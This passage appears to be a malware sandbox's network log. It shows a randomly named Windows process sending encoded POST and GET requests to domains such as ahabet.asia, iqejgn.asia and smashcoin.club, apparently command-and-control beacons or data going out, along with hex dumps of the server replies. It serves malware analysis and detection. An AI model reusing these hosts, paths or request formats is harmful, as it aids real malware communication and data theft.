LQGOmQWQ4pHkxj2ckzD9fr2z0vy01Dce/oT7GPa3sMojjdB7D3w5so2xyDs00I3Z2GUVImhr2sc/2yGBLH8n4bY5/OHJ [TRUNCATED]
Aug 6, 2024 07:59:06.503858089 CEST	399	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 06 Aug 2024 05:59:06 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.iqejgn.asia/9rz8/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49746	45.76.85.183	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:08.413934946 CEST	535	OUT	GET /9rz8/?wLTtn0=1tNn+IIyVW1A+sqKfEQy04NS/ZRVpIAq0YPUAX7Hfg7Vkl0yzx5JyzOVFmasMRZI7I9GTVzgvvzAn0zvpweIE6n4FW+v1Etr1hIa7dN5V1blzPzjU/O8FybgPZzZOf2wgBLswD1Be9R7&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.iqejgn.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:59:09.039009094 CEST	564	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 06 Aug 2024 05:59:08 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.iqejgn.asia/9rz8/?wLTtn0=1tNn+IIyVW1A+sqKfEQy04NS/ZRVpIAq0YPUAX7Hfg7Vkl0yzx5JyzOVFmasMRZI7I9GTVzgvvzAn0zvpweIE6n4FW+v1Etr1hIa7dN5V1blzPzjU/O8FybgPZzZOf2wgBLswD1Be9R7&K4G=Thy4J4VXH8ud Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49747	198.54.126.42	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:23.270353079 CEST	792	OUT	POST /u6by/ HTTP/1.1 Host: www.ahabet.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ahabet.asia Referer: http://www.ahabet.asia/u6by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 69 61 53 35 4b 4c 59 37 57 59 4f 56 74 31 2b 6c 41 2b 4e 78 2b 5a 69 38 4c 33 57 70 34 70 56 6e 6e 67 6c 75 6f 36 4a 39 6a 37 47 36 53 61 6c 79 58 41 55 58 2b 30 70 49 73 35 6e 78 53 68 6f 67 2b 36 30 49 4a 39 55 42 56 63 57 46 75 6f 54 73 6c 47 44 4d 4b 6d 62 59 4b 63 77 39 49 4e 59 72 69 75 33 4b 4f 42 64 4d 31 62 64 4b 62 54 66 4e 65 4d 4c 4c 38 30 44 56 33 59 5a 43 74 71 67 4c 79 69 55 55 56 57 59 63 79 53 54 77 45 4d 68 42 78 6c 70 59 4b 72 74 6c 36 36 4f 73 4f 55 53 63 30 5a 79 66 69 42 2b 33 75 70 5a 2f 31 43 45 2b 47 45 64 31 65 42 32 68 70 51 37 46 6a 59 76 67 53 41 4f 47 52 53 4f 31 6f 65 76 79 2b 66 35 6d 41 3d 3d Data Ascii: wLTtn0=OiaS5KLY7WYOVt1+lA+Nx+Zi8L3Wp4pVnngluo6J9j7G6SalyXAUX+0pIs5nxShog+60IJ9UBVcWFuoTslGDMKmbYKcw9INYriu3KOBdM1bdKbTfNeMLL80DV3YZCtqgLyiUUVWYcySTwEMhBxlpYKrtl66OsOUSc0ZyfiB+3upZ/1CE+GEd1eB2hpQ7FjYvgSAOGRSO1oevy+f5mA==
Aug 6, 2024 07:59:24.118792057 CEST	479	IN	HTTP/1.1 404 Not Found date: Tue, 06 Aug 2024 05:59:24 GMT server: Apache content-length: 315 content-type: text/html; charset=iso-8859-1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49748	198.54.126.42	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:25.810472012 CEST	812	OUT	POST /u6by/ HTTP/1.1 Host: www.ahabet.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ahabet.asia Referer: http://www.ahabet.asia/u6by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 69 61 53 35 4b 4c 59 37 57 59 4f 55 4f 39 2b 32 54 57 4e 33 65 5a 39 32 72 33 57 7a 49 6f 65 6e 6e 73 6c 75 70 2b 6a 6f 41 66 47 36 33 6d 6c 78 57 41 55 57 2b 30 70 43 4d 35 37 38 79 68 6e 67 2b 32 53 49 4e 39 55 42 56 59 57 46 71 73 54 73 57 65 45 4e 61 6d 56 42 61 63 79 69 59 4e 59 72 69 75 33 4b 4f 56 33 4d 31 44 64 4c 72 44 66 4d 2f 4d 49 42 63 30 63 46 6e 59 5a 4a 4e 71 6b 4c 79 69 79 55 52 57 79 63 78 6d 54 77 46 38 68 42 67 6c 75 53 4b 72 33 68 36 37 6d 71 74 70 68 52 78 4a 75 58 54 39 51 74 65 6c 5a 33 6a 66 6d 6b 6b 49 78 72 50 35 4e 6c 72 30 4e 53 46 46 61 69 54 45 57 4c 7a 6d 76 71 66 37 46 2f 73 2b 39 77 36 30 68 33 73 65 72 47 46 51 53 51 64 44 61 67 6b 30 5a 44 48 59 3d Data Ascii: wLTtn0=OiaS5KLY7WYOUO9+2TWN3eZ92r3WzIoennslup+joAfG63mlxWAUW+0pCM578yhng+2SIN9UBVYWFqsTsWeENamVBacyiYNYriu3KOV3M1DdLrDfM/MIBc0cFnYZJNqkLyiyURWycxmTwF8hBgluSKr3h67mqtphRxJuXT9QtelZ3jfmkkIxrP5Nlr0NSFFaiTEWLzmvqf7F/s+9w60h3serGFQSQdDagk0ZDHY=
Aug 6, 2024 07:59:26.650542974 CEST	479	IN	HTTP/1.1 404 Not Found date: Tue, 06 Aug 2024 05:59:26 GMT server: Apache content-length: 315 content-type: text/html; charset=iso-8859-1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49749	198.54.126.42	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:28.356131077 CEST	1825	OUT	POST /u6by/ HTTP/1.1 Host: www.ahabet.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.ahabet.asia Referer: http://www.ahabet.asia/u6by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 69 61 53 35 4b 4c 59 37 57 59 4f 55 4f 39 2b 32 54 57 4e 33 65 5a 39 32 72 33 57 7a 49 6f 65 6e 6e 73 6c 75 70 2b 6a 6f 41 58 47 36 6c 65 6c 7a 31 34 55 51 4f 30 70 5a 4d 35 34 38 79 68 41 67 2b 75 57 49 4e 78 75 42 58 51 57 4b 70 6b 54 71 6a 79 45 45 61 6d 56 63 4b 63 78 39 49 4e 4e 72 69 65 7a 4b 4f 46 33 4d 31 44 64 4c 74 76 66 61 65 4d 49 53 4d 30 44 56 33 59 56 43 74 71 41 4c 79 71 4d 55 52 61 49 62 48 57 54 70 6c 73 68 43 53 64 75 52 71 72 78 73 61 37 2b 71 74 6c 2b 52 78 39 49 58 54 4a 36 74 5a 68 5a 6e 46 61 42 31 6e 49 78 34 75 52 7a 69 49 77 64 46 47 46 6f 70 54 51 38 4b 78 4f 2b 70 75 7a 44 79 73 4b 48 6b 4f 6c 39 76 2b 57 4f 42 31 67 34 64 59 4b 74 36 45 59 36 59 6e 2b 4b 37 46 47 69 6b 6e 76 2f 78 68 55 75 6e 4a 32 33 65 67 35 50 6d 51 4a 31 65 30 59 4e 76 37 36 39 58 34 47 69 32 72 37 64 66 59 4c 52 36 66 64 7a 79 4d 78 55 65 38 5a 36 51 73 63 65 6d 66 79 4a 75 65 44 43 73 6f 58 2f 72 39 76 6b 36 4b 6e 45 56 4c 67 70 37 49 32 4d 6c 61 6f 62 55 45 68 68 55 6c 42 [TRUNCATED] Data Ascii: wLTtn0=OiaS5KLY7WYOUO9+2TWN3eZ92r3WzIoennslup+joAXG6lelz14UQO0pZM548yhAg+uWINxuBXQWKpkTqjyEEamVcKcx9INNriezKOF3M1DdLtvfaeMISM0DV3YVCtqALyqMURaIbHWTplshCSduRqrxsa7+qtl+Rx9IXTJ6tZhZnFaB1nIx4uRziIwdFGFopTQ8KxO+puzDysKHkOl9v+WOB1g4dYKt6EY6Yn+K7FGiknv/xhUunJ23eg5PmQJ1e0YNv769X4Gi2r7dfYLR6fdzyMxUe8Z6QscemfyJueDCsoX/r9vk6KnEVLgp7I2MlaobUEhhUlBP2TJzpDpks83zHrvJWNq4i9wB/X+6FPDjFpO4luffA68x8UlMM768SFBqi2n83Yw0uG5YrWAHfDTtxNtREs2Eue94fqeoXC0OUSr9+ip4W6A0mhb/njEj+19znewjPWTQMFjIuUZm2oQz+Ow468wpF69it3owaAYNM7pP1rnnDTAS5MeZCanZHViVJaj7ixU1drpZPpr7RfOtWZ5g8jxVllZEuODui2sYjBEbQ7teJbz37VigUHeEHPe1oiYf06q5ez6kfb3vDnlqr+GZOLSEpYcjvHioZQURvCT79oFfNwflpxm97r8vM8TjMSw6yIwYtBZShPlihmzXE2GDQh30zzdtw9QzAPpS6NFtAtwBzeB7/IYgT5PGgfJA4Ij8qXblvtRQjk9Etd+Kb2I51SZcTMBDILQZB+om7GNH7929N++Lap7zM14foEGFUPXnGbFNo4yslicScicGXjFTjUmDj8nL/TavZ5nyaAVp7ejEyW+3QxsuG101TZ1fY0U9GYecV2u51BSLVYzMXpT30UNn8YmbJLRVAM7iFaMkJbAEZmY6lQ1IE5/BY5fvNCLsrFauvmGiLH9tgsaAxwybmO2NcILcyy5dbPOXmzq7FfRyDphKI8wGkzyj5MWQ+OjwlkPw6tunAGQOMNQ7OJu6WsXH2+5QhcrVSNqxd [TRUNCATED]
Aug 6, 2024 07:59:29.214601994 CEST	479	IN	HTTP/1.1 404 Not Found date: Tue, 06 Aug 2024 05:59:29 GMT server: Apache content-length: 315 content-type: text/html; charset=iso-8859-1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49750	198.54.126.42	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:30.901339054 CEST	535	OUT	GET /u6by/?wLTtn0=Dgyy682ZoHxveMZk4QaM25kax6qdmalts1J5/prtzj+Aj121xn42JvEKKfsZxRJ9g864IpRnQiIzJbkQp123GayICJ5t871z+USYFJdFSkTRN67PbuVXFd9aYnYsNcOxPieDa3nrDHGu&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.ahabet.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 07:59:31.755877972 CEST	479	IN	HTTP/1.1 404 Not Found date: Tue, 06 Aug 2024 05:59:31 GMT server: Apache content-length: 315 content-type: text/html; charset=iso-8859-1 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49751	68.183.37.14	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:36.809534073 CEST	801	OUT	POST /9g78/ HTTP/1.1 Host: www.smashcoin.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.smashcoin.club Referer: http://www.smashcoin.club/9g78/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 61 38 70 31 31 51 41 4b 4f 58 62 53 58 36 4e 6e 37 59 36 4f 37 6b 71 72 4a 61 69 66 4f 35 72 43 52 37 46 6d 52 72 33 56 6e 63 52 38 74 54 43 65 39 77 6f 56 66 62 79 55 59 37 6c 54 38 61 4c 31 6d 42 4c 75 59 4c 6d 68 66 43 37 45 5a 79 38 45 69 65 72 55 36 4d 7a 36 66 70 4c 35 42 47 4f 44 58 44 4f 75 36 33 69 66 72 41 38 79 56 6b 6c 64 79 30 7a 54 37 66 61 50 55 56 47 52 49 38 70 6d 64 54 67 45 31 78 50 55 50 32 30 69 30 55 36 61 44 71 39 32 78 44 68 36 6b 4c 5a 5a 53 70 65 78 69 70 43 4e 64 47 4f 5a 4c 65 71 4a 55 2b 4d 35 4f 6e 7a 53 42 73 56 79 4e 73 4b 48 6b 44 74 69 6e 5a 62 6d 38 68 35 62 4c 52 58 51 62 49 49 50 68 77 3d 3d Data Ascii: wLTtn0=a8p11QAKOXbSX6Nn7Y6O7kqrJaifO5rCR7FmRr3VncR8tTCe9woVfbyUY7lT8aL1mBLuYLmhfC7EZy8EierU6Mz6fpL5BGODXDOu63ifrA8yVkldy0zT7faPUVGRI8pmdTgE1xPUP20i0U6aDq92xDh6kLZZSpexipCNdGOZLeqJU+M5OnzSBsVyNsKHkDtinZbm8h5bLRXQbIIPhw==
Aug 6, 2024 07:59:37.399935007 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 05:59:37 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 15 14 42 c0 dd 76 71 a1 ae 65 cd 1e 3c a6 cd 2c 29 74 9b 9a a4 16 ff bd 69 17 c1 cb c0 9b f9 de e3 0d bf c9 df b7 f2 b3 2a e0 55 be 95 50 9d 36 e5 7e 0b ab 7b c4 7d 21 77 88 b9 cc af 97 35 4b 11 8b c3 4a 24 dc 84 4b 27 b8 21 a5 a3 08 6d e8 48 64 69 06 07 1b 60 67 c7 5e 73 bc 2e 13 8e 0b c4 6b ab 7f 66 df 83 f8 c7 44 95 f0 41 48 43 e0 e8 6b 24 1f 48 c3 e9 58 c2 a4 3c f4 91 3b cf 1c d8 1e 82 69 3d 78 72 df e4 18 c7 61 4e 72 71 28 ad 1d 79 2f 5e 06 d5 18 c2 35 cb d8 e3 33 dc e6 54 b7 aa bf 83 8f c5 00 2a c0 34 4d cc 5f 94 37 8d 6d 7b d6 74 63 0d 95 75 01 9e 52 8e 7f 21 b1 eb d2 32 f6 9a bf 4b 7e 01 00 00 ff ff 0d 0a 61 0d 0a 03 00 77 cb be 04 18 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8LAK0`.Bvqe<,)tiUP6~{}!w5KJ$K'!mHdi`g^s.kfDAHCk$HX<;i=xraNrq(y/^53T4M_7m{tcuR!2K~aw0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49752	68.183.37.14	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:59:39.355711937 CEST	821	OUT	POST /9g78/ HTTP/1.1 Host: www.smashcoin.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.smashcoin.club Referer: http://www.smashcoin.club/9g78/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 61 38 70 31 31 51 41 4b 4f 58 62 53 57 61 39 6e 35 37 43 4f 39 45 71 30 43 36 69 66 63 35 72 47 52 37 35 6d 52 71 44 38 6e 75 31 38 74 7a 79 65 38 31 49 56 59 62 79 55 4d 4c 6c 57 78 36 4c 2b 6d 42 58 6d 59 50 6d 68 66 47 54 45 5a 77 6b 45 6a 70 33 58 6f 73 7a 34 56 35 4c 33 63 57 4f 44 58 44 4f 75 36 33 32 31 72 41 6b 79 55 51 68 64 7a 51 48 4d 6e 76 61 51 52 6c 47 52 43 63 6f 76 64 54 68 68 31 77 53 7a 50 7a 77 69 30 52 65 61 44 66 4a 33 34 44 68 38 70 72 5a 50 55 61 48 37 36 71 79 50 5a 58 36 63 45 65 32 4b 59 6f 52 62 55 46 2f 2b 66 39 74 4a 4a 75 75 78 7a 6c 77 58 6c 59 66 2b 78 44 4e 36 55 6d 79 36 57 61 70 4c 33 48 65 62 69 6a 5a 58 31 72 69 53 41 32 67 79 4a 2b 41 74 34 37 45 3d Data Ascii: wLTtn0=a8p11QAKOXbSWa9n57CO9Eq0C6ifc5rGR75mRqD8nu18tzye81IVYbyUMLlWx6L+mBXmYPmhfGTEZwkEjp3Xosz4V5L3cWODXDOu6321rAkyUQhdzQHMnvaQRlGRCcovdThh1wSzPzwi0ReaDfJ34Dh8prZPUaH76qyPZX6cEe2KYoRbUF/+f9tJJuuxzlwXlYf+xDN6Umy6WapL3HebijZX1riSA2gyJ+At47E=
